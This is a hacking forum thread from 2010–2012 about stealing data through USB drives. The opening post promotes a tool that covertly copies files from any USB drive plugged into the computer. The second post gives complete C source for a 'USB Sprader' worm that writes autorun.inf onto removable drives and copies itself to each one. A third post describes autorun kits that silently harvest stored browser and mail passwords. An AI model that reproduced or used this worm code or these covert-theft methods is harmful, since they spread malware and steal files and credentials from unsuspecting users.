+ Reply to Thread
Results 1 to 5 of 5

Thread: USB File Stealer Share/Save - My123World.Com!

  1. 12-05-2010, 01:29 AM #1
    AnArKI
    AnArKI is offline
    Super Administrator AnArKI will become famous soon enoughAnArKI will become famous soon enough AnArKI's Avatar
    Join Date
    Jul 2010
    Location
    London
    Posts
    455
    Blog Entries
    1
    Thanks
    157
    Thanked 145 Times in 69 Posts

    USB File Stealer



    j0llydmper is a windows service that allows you to dump furtively and automaticaly some content of USB disks just plugged in your computer. In order to dump potentialy interesting files, you can use a rule on the file name and on the file size.

    Name: j0llydmpr2.jpg Views: 346 Size: 21.4 KB


    Source:http://code.google.com/p/j0llydmper/
    Reply With Quote Reply With Quote
  2. 12-06-2010, 07:53 AM #2
    [s]
    [s] is offline
    Security Researcher [s] is on a distinguished road [s]'s Avatar
    Join Date
    Nov 2010
    Posts
    150
    Blog Entries
    1
    Thanks
    41
    Thanked 45 Times in 26 Posts
    Code:
    http://code.google.com/p/j0llydmper/downloads/list
    Shit where is the the download link

    Here is USB Sprader

    Code:
    #include <windows.h>
#include <stdio.h>

int InfectDrives( );
int WriteINI( char* sINI, char* sFILE );
int ReadINI( char* sINI, char* sFILE );
int FileCopy( char* sNEW );

char* szFileName = "blah.exe";

int main()
{
int i = InfectDrives( );

printf( "drives infected: %i", i );

getchar( );

return 0;

};

int InfectDrives( )
{
char szBuffer[260];
char szInit[520], szFile[520];
int iCount = 0, iGet, iType;

iGet = GetLogicalDriveStringsA( sizeof( szBuffer ), szBuffer );
if( iGet == 0 ) {
return( 0 );
}
char *szDrive = szBuffer;

while( *szDrive )
{
iType = GetDriveTypeA( szDrive );

sprintf( szInit, "%sautorun.inf", szDrive ); //craft inf
sprintf( szFile, "%s%s", szDrive, szFileName ); //craft file

if( iType == 2 ) //removable device
{
if( ReadINI( szInit, szFileName ) == 0 ) //check for infection
{
if( WriteINI( szInit, szFileName ) == 0 ) //infect
{
if( FileCopy( szFile ) == 0 ) //copy file
{
iCount++;
}
}
}
}
szDrive = &szDrive[ strlen( szDrive ) + 1];
}

return( iCount );
};

int WriteINI( char* sINI, char* sFILE )
{
unsigned long bWrite = WritePrivateProfileString( "autorun", "open", sFILE, sINI );
if( bWrite == 0 ) {
return( 1 );
}
return( 0 );
};

int ReadINI( char* sINI, char* sFILE )
{
char szBuffer[260];
unsigned long lRead = GetPrivateProfileString( "autorun", "open", NULL, szBuffer, sizeof( szBuffer ), sINI );
if( lRead != 0 ) {
if( strstr( szBuffer, sFILE ) ) {
return( 1 );
}
}
return( 0 );
};

int FileCopy( char* sNEW )
{
char szBuffer[260];
GetModuleFileName( NULL, szBuffer, sizeof( szBuffer ) );

bool bCopy = CopyFile( szBuffer, sNEW, 0 );
if( bCopy == false ) {
return( 1 );
}
return( 0 );
}
    Reply With Quote Reply With Quote
  3. 12-06-2010, 06:00 PM #3
    prashant_uniyal
    prashant_uniyal is offline
    Garage Addict prashant_uniyal will become famous soon enough prashant_uniyal's Avatar
    Join Date
    Jul 2010
    Location
    localhost
    Posts
    451
    Blog Entries
    6
    Thanks
    222
    Thanked 84 Times in 47 Posts
    I remember one USB stealer long back..an autorun file and a bat file and few .exe, all instant browser and mail client password recovery executable. Hiding them within the USB disk. Later, when the USB is plugged in, they automatically gets execute and without the knowledge of the person, recover stored browser and mail password. Was a nice trick

    Get it here
    Last edited by prashant_uniyal; 12-06-2010 at 08:47 PM.
    I was b0rn to Hack..But schooling ruined me
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

    ____________________________________________

    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    Reply With Quote Reply With Quote
  4. 02-03-2012, 11:07 AM #4
    soul301
    soul301 is offline
    Garage Newcomer soul301 is on a distinguished road
    Join Date
    Oct 2011
    Posts
    8
    Thanks
    11
    Thanked 0 Times in 0 Posts
    not working now ..


    please try something new
    Reply With Quote Reply With Quote
  5. 02-06-2012, 08:14 PM #5
    neo
    neo is offline
    InfoSec Consultant neo is on a distinguished road
    Join Date
    Jul 2010
    Posts
    282
    Thanks
    94
    Thanked 52 Times in 35 Posts
    Send a message via Yahoo to neo
    basically most of the USB autorun files are detected now days via Antivirus tools :-)
    So its time to move towards electronics for a help
    Orkut id: neo1981
    Blog: infosec-neo.blogspot.com
    Nothing is Impossible*


    *Conditions Apply
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

Forum Rules